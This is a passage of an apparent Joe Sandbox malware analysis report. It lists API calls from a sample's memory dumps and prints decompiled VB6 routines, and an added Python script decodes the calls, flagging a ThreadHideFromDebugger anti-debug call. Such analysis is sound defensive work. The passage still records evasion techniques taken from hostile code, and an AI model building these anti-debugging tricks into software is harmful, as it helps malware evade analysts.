                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        • LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                          • Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationLibraryLoadMemoryProtectThreadVirtual
                                                        • String ID:
                                                        • API String ID: 449006233-0
                                                        • Opcode ID: 303bf4a4c3c14855e924e98ea3ac0b64b5e89a5e8b8944824016709ea4ed3d78
                                                        • Instruction ID: bf209710b8407f390dede869546856a4a848f5d8d6e994e36938f9b2e70bd82b
                                                        • Opcode Fuzzy Hash: 303bf4a4c3c14855e924e98ea3ac0b64b5e89a5e8b8944824016709ea4ed3d78
                                                        • Instruction Fuzzy Hash: 72510871904341CECF318F28D8E47A5BB969F53270F5982AAD5928F6D7C3718482CB12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%
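The entries above all pass through the same NtSetInformationThread call at 0x02390968: handle 000000FE (the report's rendering of the GetCurrentThread() pseudo-handle, (HANDLE)-2), ThreadInformationClass 0x11, which is ThreadHideFromDebugger, with a NULL buffer and length 0. That is the call behind the "Hides threads from debuggers" signature in the summary. The small triage script below is an added example, not part of the Joe Sandbox report or of the sample; it parses API lines in the exact form this listing prints them and decodes the arguments that matter for analysis. It assumes that the report prints a fixed window of 16 stack dwords after each call, so only the first N slots (N taken from the documented prototype of each API) are real arguments and the rest is stack residue; that the truncated 000000FE / 000000FF values stand for the -2 / -1 pseudo-handles; and it uses the public constant values ThreadHideFromDebugger = 0x11, PAGE_EXECUTE_READWRITE = 0x40, GENERIC_READ = 0x80000000 and OPEN_EXISTING = 3. The sample lines are copied from this page.

```python
"""Decode API call lines from a Joe Sandbox function listing (added example)."""
import re
from dataclasses import dataclass

# Constructed sample: five API lines copied verbatim from the listing on this page.
SAMPLE_LINES = [
    "• NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968",
    "• Part of subcall function 02399264: NtProtectVirtualMemory.NTDLL(000000FF,?,?,?,?,02398C63,00000040,023908D5,00000000,00000000,00000000,00000000,?,00000000,00000000,02397003), ref: 0239927F",
    "• CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,02394748,02394848,023909A5,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188), ref: 02394800",
    "• TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0",
    "• LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D",
]

LINE_RE = re.compile(r"(\w+)\.(\w+)\((.*?)\), ref: ([0-9A-Fa-f]+)")

# Real argument count per API (from the documented prototypes). Assumption: the report
# dumps 16 stack dwords per call, so slots beyond this count are residue, not arguments.
ARGC = {
    "NtSetInformationThread": 4,  # ThreadHandle, ThreadInformationClass, ThreadInformation, Length
    "NtProtectVirtualMemory": 5,  # ProcessHandle, *BaseAddress, *RegionSize, NewProtect, *OldProtect
    "CreateFileA": 7,
    "TerminateProcess": 2,
    "LoadLibraryA": 1,
}

THREADINFOCLASS = {0x11: "ThreadHideFromDebugger"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
CREATE_DISP = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}


@dataclass
class Call:
    api: str
    module: str
    args: list   # real arguments only; None where the report printed '?'
    ref: int     # address of the call site


def fmt(v):
    return "?" if v is None else f"0x{v:08X}"


def pseudo_handle(v):
    # Assumption: the report prints the pseudo-handles truncated to one byte
    # (000000FE, 000000FF); the real values are (HANDLE)-2 and (HANDLE)-1.
    if v in (0xFE, 0xFFFFFFFE):
        return "GetCurrentThread()"
    if v in (0xFF, 0xFFFFFFFF):
        return "GetCurrentProcess()"
    return fmt(v)


def parse_line(line):
    """Return a Call for one report line, or None if the line is not an API entry."""
    m = LINE_RE.search(line)
    if not m:
        return None
    api, module, raw, ref = m.groups()
    slots = [None if s == "?" else int(s, 16) for s in raw.split(",")]
    return Call(api, module, slots[:ARGC.get(api, len(slots))], int(ref, 16))


def describe(call):
    """Human-readable decoding plus a flag for the one clearly anti-analysis call."""
    a = call.args
    if call.api == "NtSetInformationThread":
        cls = THREADINFOCLASS.get(a[1], f"class {fmt(a[1])}")
        desc = f"NtSetInformationThread({pseudo_handle(a[0])}, {cls}, {fmt(a[2])}, {fmt(a[3])})"
        if cls == "ThreadHideFromDebugger":
            desc += ": calling thread hidden from any attached debugger (anti-debug)"
        return desc, cls == "ThreadHideFromDebugger"
    if call.api == "NtProtectVirtualMemory":
        if a[3] is None:
            prot = "unknown (not recoverable from the dump)"
        else:
            prot = PAGE_PROTECT.get(a[3], fmt(a[3]))
        return f"NtProtectVirtualMemory({pseudo_handle(a[0])}, NewProtect={prot})", a[3] == 0x40
    if call.api == "CreateFileA":
        access = [n for bit, n in GENERIC.items() if a[1] is not None and a[1] & bit] or [fmt(a[1])]
        desc = (f"CreateFileA(lpFileName={fmt(a[0])}, {'|'.join(access)}, "
                f"dwShareMode={fmt(a[2])}, {CREATE_DISP.get(a[4], fmt(a[4]))})")
        return desc, False
    if call.api == "TerminateProcess":
        desc = f"TerminateProcess({pseudo_handle(a[0])}, uExitCode={fmt(a[1])})"
        if a[0] in (0xFF, 0xFFFFFFFF):
            desc += ": process terminates itself"
        return desc, False
    return f"{call.api}({', '.join(fmt(v) for v in a)})", False


def triage(lines):
    """Decode every API line; returns one dict per call in input order."""
    findings = []
    for line in lines:
        call = parse_line(line)
        if call is None:
            continue
        desc, flag = describe(call)
        findings.append({"api": call.api, "ref": f"0x{call.ref:08X}",
                         "desc": desc, "suspicious": flag})
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_LINES):
        print(("!! " if f["suspicious"] else "   ") + f["ref"] + "  " + f["desc"])
```

Note that the NtProtectVirtualMemory line shows '?' for NewProtect, so the script reports it as unknown rather than reading the 00000040 that appears further along in the stack window; that slot is outside the five real arguments and must not be decoded as a protection constant.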

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 644477e01319e62f7c1f88e0d902422f403b03e11b2ad2c4685905df8b02a335
                                                        • Instruction ID: 9254ae7752ddff8693d546f9c3b2d8f26af968c43603307d0a73a6c6af30bd58
                                                        • Opcode Fuzzy Hash: 644477e01319e62f7c1f88e0d902422f403b03e11b2ad2c4685905df8b02a335
                                                        • Instruction Fuzzy Hash: C95109719043818ECF358F28D8D47A5BB969F53230F5882DAD5928F6D7C3718482C712
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6b264853ca8b8c9e456b2e7b98b8437f20fd550e2c121484fb02f7f2f0695f2
                                                        • Instruction ID: 8675a365e2a748164780b6ec43da30060f2d2c52fc64f24a465c2e0423c55e29
                                                        • Opcode Fuzzy Hash: f6b264853ca8b8c9e456b2e7b98b8437f20fd550e2c121484fb02f7f2f0695f2
                                                        • Instruction Fuzzy Hash: 3C412B75744A02BFDF289E288C90BE773AABF16760F54422AEC99D3641DB11D885CB40
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 863697202a2a8009ad624fa02c0da8ee25d31a9bda9cadba8e4d11b66f693f8c
                                                        • Instruction ID: e806a62b283600c85744710ed12f7dca759b34fcde96566b896eba7e7e05496e
                                                        • Opcode Fuzzy Hash: 863697202a2a8009ad624fa02c0da8ee25d31a9bda9cadba8e4d11b66f693f8c
                                                        • Instruction Fuzzy Hash: F3315870784705EEFF356E148DE4BE63356AF03714F988069EE869B1D2D760C885CA12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • NtSetInformationThread.NTDLL(000000FE,00000011,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,023908D5,00000000,00000000,00000000,00000000), ref: 02390968
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: InformationThread
                                                        • String ID:
                                                        • API String ID: 4046476035-0
                                                        • Opcode ID: e27450db8d516bf883aa3eb2e537c5bf8969db19257e3fd0e6fd8c81b711ebe5
                                                        • Instruction ID: 3894c408011a250dc8589cbe7f6b47a7c3c7fa3171186a2d430a776b0ca783be
                                                        • Opcode Fuzzy Hash: e27450db8d516bf883aa3eb2e537c5bf8969db19257e3fd0e6fd8c81b711ebe5
                                                        • Instruction Fuzzy Hash: 05216870784305EEFF356E144DD4BE6335AAF07314F948065EE869B0D2D7A0C886CA12
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7fe0eacfd117e31998b8531c418138dc6fd6d849c821200786851e5a61407a9a
                                                        • Instruction ID: 5b0fa3350e439e6d3993ffe4ce2ee7981629d6e6bce1770527d7efdb2ff3d582
                                                        • Opcode Fuzzy Hash: 7fe0eacfd117e31998b8531c418138dc6fd6d849c821200786851e5a61407a9a
                                                        • Instruction Fuzzy Hash: 79C04CBB650581DBEF12DA89E891BD47365F725A44FC504D1F103AF656E215ED41CA00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 22bec2a47e8a69cf26464b0e731a52b1a0c01efefa56e74a65037f4241a12859
                                                        • Instruction ID: 82eb5c67f2b94f266c3a12389c1191b3308af56f8e0f22c465c7a2558b2339ee
                                                        • Opcode Fuzzy Hash: 22bec2a47e8a69cf26464b0e731a52b1a0c01efefa56e74a65037f4241a12859
                                                        • Instruction Fuzzy Hash: BAC04C31252640CFCF45CA0ED3D1A5173ADAB56650F055491A81287F26C754D804CD00
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 714467281263e38b168d49f53dff885bab39f58d86784bdb02f189f872327e2a
                                                        • Instruction ID: 406f4fa0b0725f4eac96311ad4c4841a475d5c0805a0bd1bc00f332faa5178ac
                                                        • Opcode Fuzzy Hash: 714467281263e38b168d49f53dff885bab39f58d86784bdb02f189f872327e2a
                                                        • Instruction Fuzzy Hash: 1FC04C31311640CBCA85CA4AD3D1B4173A9AB55650F155490E81187B21C355D804C900
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 51%
                                                        			E00411121(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a28) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				void* _v28;
                                                        				void* _v32;
                                                        				void* _v36;
                                                        				char _v40;
                                                        				void* _v44;
                                                        				signed int _v48;
                                                        				intOrPtr* _v52;
                                                        				signed int _v56;
                                                        				char _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				void* _t42;
                                                        				signed int _t43;
                                                        				signed int _t49;
                                                        				intOrPtr _t70;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t70;
                                                        				_t42 = 0x34;
                                                        				L00401210();
                                                        				_v12 = _t70;
                                                        				_v8 = 0x4011c8;
                                                        				L0040130C();
                                                        				_push(0);
                                                        				_push(0xffffffff);
                                                        				_push(0x404a90);
                                                        				_push(0x404a84);
                                                        				_push(0x404a90);
                                                        				L004012B8();
                                                        				L004012D6();
                                                        				_push(_t42);
                                                        				L004012AC();
                                                        				_v44 =  ~(0 | _t42 != 0x00000003);
                                                        				L00401306();
                                                        				_t43 = _v44;
                                                        				if(_t43 != 0) {
                                                        					if( *0x41233c != 0) {
                                                        						_v64 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v64 = 0x41233c;
                                                        					}
                                                        					_t13 =  &_v64; // 0x41233c
                                                        					_v44 =  *((intOrPtr*)( *_t13));
                                                        					_t49 =  *((intOrPtr*)( *_v44 + 0x1c))(_v44,  &_v36);
                                                        					asm("fclex");
                                                        					_v48 = _t49;
                                                        					if(_v48 >= 0) {
                                                        						_v68 = _v68 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v44);
                                                        						_push(_v48);
                                                        						L0040131E();
                                                        						_v68 = _t49;
                                                        					}
                                                        					_v52 = _v36;
                                                        					_t43 =  *((intOrPtr*)( *_v52 + 0x64))(_v52, 1,  &_v40);
                                                        					asm("fclex");
                                                        					_v56 = _t43;
                                                        					if(_v56 >= 0) {
                                                        						_v72 = _v72 & 0x00000000;
                                                        					} else {
                                                        						_push(0x64);
                                                        						_push(0x404a70);
                                                        						_push(_v52);
                                                        						_push(_v56);
                                                        						L0040131E();
                                                        						_v72 = _t43;
                                                        					}
                                                        					L00401318();
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x41126f);
                                                        				L00401306();
                                                        				return _t43;
                                                         			}

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 0041113C
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00411154
                                                        • __vbaStrCat.MSVBVM60(00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 0041116C
                                                        • __vbaStrMove.MSVBVM60(00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411176
                                                        • #709.MSVBVM60(00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 0041117C
                                                        • __vbaFreeStr.MSVBVM60(00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411192
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 004111B6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000), ref: 004111FA
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000064,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000), ref: 00411237
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411248
                                                        • __vbaFreeStr.MSVBVM60(0041126F,00000000,00404A90,00404A84,00404A90,000000FF,00000000,?,?,?,?,00401216), ref: 00411269
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                         • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                         • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$Free$CheckHresult$#709ChkstkCopyMoveNew2
                                                        • String ID: <#A
                                                        • API String ID: 1155717335-1833091969
                                                        • Opcode ID: d27dc5964f2269483c83c2a9b7399468b515e9ae78a83df91505121d9dae10cc
                                                        • Instruction ID: 627081641be15c8a9a2fe851341b9221cd301dcaaff88955343c9046908fcf64
                                                        • Opcode Fuzzy Hash: d27dc5964f2269483c83c2a9b7399468b515e9ae78a83df91505121d9dae10cc
                                                        • Instruction Fuzzy Hash: 77311970A40208AFDB11EBA1D942FDEBBB4BF08714F10416AF601B61E1D7785981CB18
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 59%
                                                        			E00411344(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
                                                        				void* _v28;
                                                        				intOrPtr _v36;
                                                        				char _v44;
                                                        				intOrPtr _v52;
                                                        				intOrPtr _v60;
                                                        				void* _v64;
                                                        				signed int _v68;
                                                        				intOrPtr* _v72;
                                                        				signed int _v76;
                                                        				char _v88;
                                                        				signed int _v92;
                                                        				signed int _v96;
                                                        				signed short _t49;
                                                        				signed int _t53;
                                                        				signed int _t59;
                                                        				void* _t71;
                                                        				void* _t73;
                                                        				intOrPtr _t74;
                                                        
                                                        				_t74 = _t73 - 0xc;
                                                        				 *[fs:0x0] = _t74;
                                                        				L00401210();
                                                        				_v16 = _t74;
                                                        				_v12 = 0x4011e8;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x48,  *[fs:0x0], 0x401216, _t71);
                                                        				_v36 = 0x4b05;
                                                        				_v44 = 2;
                                                        				_t49 =  &_v44;
                                                        				_push(_t49);
                                                        				L004012A6();
                                                        				asm("sbb eax, eax");
                                                        				_v64 =  ~( ~( ~_t49));
                                                        				L00401312();
                                                        				_t53 = _v64;
                                                        				if(_t53 != 0) {
                                                        					if( *0x41233c != 0) {
                                                        						_v88 = 0x41233c;
                                                        					} else {
                                                        						_push(0x41233c);
                                                        						_push(0x40470c);
                                                        						L00401330();
                                                        						_v88 = 0x41233c;
                                                        					}
                                                        					_t15 =  &_v88; // 0x41233c
                                                        					_v64 =  *((intOrPtr*)( *_t15));
                                                        					_t59 =  *((intOrPtr*)( *_v64 + 0x1c))(_v64,  &_v28);
                                                        					asm("fclex");
                                                        					_v68 = _t59;
                                                        					if(_v68 >= 0) {
                                                        						_v92 = _v92 & 0x00000000;
                                                        					} else {
                                                        						_push(0x1c);
                                                        						_push(0x4046fc);
                                                        						_push(_v64);
                                                        						_push(_v68);
                                                        						L0040131E();
                                                        						_v92 = _t59;
                                                        					}
                                                        					_v72 = _v28;
                                                        					_v52 = 0x80020004;
                                                        					_v60 = 0xa;
                                                        					L00401210();
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					asm("movsd");
                                                        					_t53 =  *((intOrPtr*)( *_v72 + 0x60))(_v72, L"zqzVIeGmnCH216", 0x10);
                                                        					asm("fclex");
                                                        					_v76 = _t53;
                                                        					if(_v76 >= 0) {
                                                        						_v96 = _v96 & 0x00000000;
                                                        					} else {
                                                        						_push(0x60);
                                                        						_push(0x404a70);
                                                        						_push(_v72);
                                                        						_push(_v76);
                                                        						L0040131E();
                                                        						_v96 = _t53;
                                                        					}
                                                        					L00401318();
                                                        				}
                                                        				_push(0x41149d);
                                                        				return _t53;
                                                         			}

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00411360
                                                        • #592.MSVBVM60(00000002), ref: 00411396
                                                        • __vbaFreeVar.MSVBVM60(00000002), ref: 004113AB
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,00000002), ref: 004113CF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,0000001C,?,?,?,?,?,?,?,?,?,?,00000002), ref: 00411413
                                                        • __vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,00000002), ref: 00411438
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00404A70,00000060,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0041146E
                                                        • __vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,00000002), ref: 0041147F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                         • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                         • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                         • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkFreeHresult$#592New2
                                                        • String ID: <#A$zqzVIeGmnCH216
                                                        • API String ID: 2263007462-381297742
                                                        • Opcode ID: 3b94d5a3c7f269797ca89ad7e712ad12207bad459b329cc38cdbc9afec7a7030
                                                        • Instruction ID: 7ba8beff96dce415bd7e963d2dd5e342cf714a19d21d9a2f9db778bcf99bc3da
                                                        • Opcode Fuzzy Hash: 3b94d5a3c7f269797ca89ad7e712ad12207bad459b329cc38cdbc9afec7a7030
                                                        • Instruction Fuzzy Hash: CC41E470D40208EFDB10EFE5D985BDEBBB4BF08704F10442AF501BB2A1C7B959959B58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 50%
                                                        			E00410D3C(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				char _v32;
                                                        				void* _v36;
                                                        				intOrPtr* _v40;
                                                        				signed int _v44;
                                                        				intOrPtr* _v48;
                                                        				signed int _v52;
                                                        				short _v56;
                                                        				char _v64;
                                                        				signed int _v68;
                                                        				signed int _v72;
                                                        				signed int _t43;
                                                        				signed int _t48;
                                                        				short _t52;
                                                        				intOrPtr _t61;
                                                        
                                                        				_push(0x401216);
                                                        				_push( *[fs:0x0]);
                                                        				 *[fs:0x0] = _t61;
                                                        				_push(0x34);
                                                        				L00401210();
                                                        				_v12 = _t61;
                                                        				_v8 = 0x4011a0;
                                                        				if( *0x41233c != 0) {
                                                        					_v64 = 0x41233c;
                                                        				} else {
                                                        					_push(0x41233c);
                                                        					_push(0x40470c);
                                                        					L00401330();
                                                        					_v64 = 0x41233c;
                                                        				}
                                                        				_t5 =  &_v64; // 0x41233c
                                                        				_v40 =  *((intOrPtr*)( *_t5));
                                                        				_t43 =  *((intOrPtr*)( *_v40 + 0x14))(_v40,  &_v36);
                                                        				asm("fclex");
                                                        				_v44 = _t43;
                                                        				if(_v44 >= 0) {
                                                        					_v68 = _v68 & 0x00000000;
                                                        				} else {
                                                        					_push(0x14);
                                                        					_push(0x4046fc);
                                                        					_push(_v40);
                                                        					_push(_v44);
                                                        					L0040131E();
                                                        					_v68 = _t43;
                                                        				}
                                                        				_v48 = _v36;
                                                        				_t48 =  *((intOrPtr*)( *_v48 + 0x50))(_v48,  &_v32);
                                                        				asm("fclex");
                                                        				_v52 = _t48;
                                                        				if(_v52 >= 0) {
                                                        					_v72 = _v72 & 0x00000000;
                                                        				} else {
                                                        					_push(0x50);
                                                        					_push(0x4048c0);
                                                        					_push(_v48);
                                                        					_push(_v52);
                                                        					L0040131E();
                                                        					_v72 = _t48;
                                                        				}
                                                        				_push(_v32);
                                                        				_push(0);
                                                        				L004012DC();
                                                        				asm("sbb eax, eax");
                                                        				_v56 =  ~( ~_t48 + 1);
                                                        				L00401306();
                                                        				L00401318();
                                                        				_t52 = _v56;
                                                        				if(_t52 != 0) {
                                                        					L004012C4();
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x410e55);
                                                        				return _t52;
                                                        			}

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 00410D57
                                                        • __vbaNew2.MSVBVM60(0040470C,0041233C,?,?,?,?,00401216), ref: 00410D7C
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004046FC,00000014), ref: 00410DC0
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,004048C0,00000050), ref: 00410DFB
                                                        • __vbaStrCmp.MSVBVM60(00000000,?), ref: 00410E0E
                                                        • __vbaFreeStr.MSVBVM60(00000000,?), ref: 00410E21
                                                        • __vbaFreeObj.MSVBVM60(00000000,?), ref: 00410E29
                                                        • __vbaEnd.MSVBVM60(00000000,?), ref: 00410E36
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$CheckFreeHresult$ChkstkNew2
                                                        • String ID: <#A
                                                        • API String ID: 304406766-1833091969
                                                        • Opcode ID: 75e45a3183b2907329e98f1ece8ba2cdf883f51a772ae8bbda9eb396501685da
                                                        • Instruction ID: 241986159f4569d493661f0bc02bcb2c705a0546a84561feb5f6a96b28ea1ff6
                                                        • Opcode Fuzzy Hash: 75e45a3183b2907329e98f1ece8ba2cdf883f51a772ae8bbda9eb396501685da
                                                        • Instruction Fuzzy Hash: 7C313271E50208EFDB11EFE6D945BDEBBB4BF08704F10442AF501B62A0D7B96984CB29
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 60%
                                                        			E004109E1(void* __ebx, void* __edi, void* __esi, intOrPtr __fp0, intOrPtr* _a4, void* _a32) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr* _v16;
                                                        				char _v28;
                                                        				signed int _v40;
                                                        				signed int _v52;
                                                        				signed int _t27;
                                                        				void* _t34;
                                                        				void* _t36;
                                                        				intOrPtr* _t37;
                                                        
                                                        				_t37 = _t36 - 0xc;
                                                        				 *[fs:0x0] = _t37;
                                                        				L00401210();
                                                        				_v16 = _t37;
                                                        				_v12 = 0x401130;
                                                        				_v8 = 0;
                                                        				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x1c,  *[fs:0x0], 0x401216, _t34);
                                                        				L0040130C();
                                                        				asm("fld1");
                                                        				 *_t37 = __fp0;
                                                        				_t27 =  *((intOrPtr*)( *_a4 + 0x10c))(_a4,  &_v28);
                                                        				asm("fclex");
                                                        				_v40 = _t27;
                                                        				if(_v40 >= 0) {
                                                        					_v52 = _v52 & 0x00000000;
                                                        				} else {
                                                        					_push(0x10c);
                                                        					_push(0x404514);
                                                        					_push(_a4);
                                                        					_push(_v40);
                                                        					L0040131E();
                                                        					_v52 = _t27;
                                                        				}
                                                        				asm("wait");
                                                        				_push(0x410a78);
                                                        				L00401306();
                                                        				return _t27;
                                                        			}

                                                        APIs
                                                        • __vbaChkstk.MSVBVM60(?,00401216), ref: 004109FD
                                                        • __vbaStrCopy.MSVBVM60(?,?,?,?,00401216), ref: 00410A27
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401130,00404514,0000010C), ref: 00410A5B
                                                        • __vbaFreeStr.MSVBVM60(00410A78), ref: 00410A72
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp
                                                        Similarity
                                                        • API ID: __vba$CheckChkstkCopyFreeHresult
                                                        • String ID:
                                                        • API String ID: 3646427762-0
                                                        • Opcode ID: 5ea3f1ee96162ac21878f8d401c7cbb9f48d7816fe1beef8b4c64f9d7af6f90a
                                                        • Instruction ID: 7716b84740cf269a5a246673997571b7d9083ca892c603aeb8015b397277a287
                                                        • Opcode Fuzzy Hash: 5ea3f1ee96162ac21878f8d401c7cbb9f48d7816fe1beef8b4c64f9d7af6f90a
                                                        • Instruction Fuzzy Hash: B5112A70940208EFCB01EF94C845BDD7BB4EF18744F10816AF904BB2A1C3B99A85CB98
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 68%
                                                        			E0041128A(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8) {
                                                        				intOrPtr _v8;
                                                        				intOrPtr _v12;
                                                        				intOrPtr _v16;
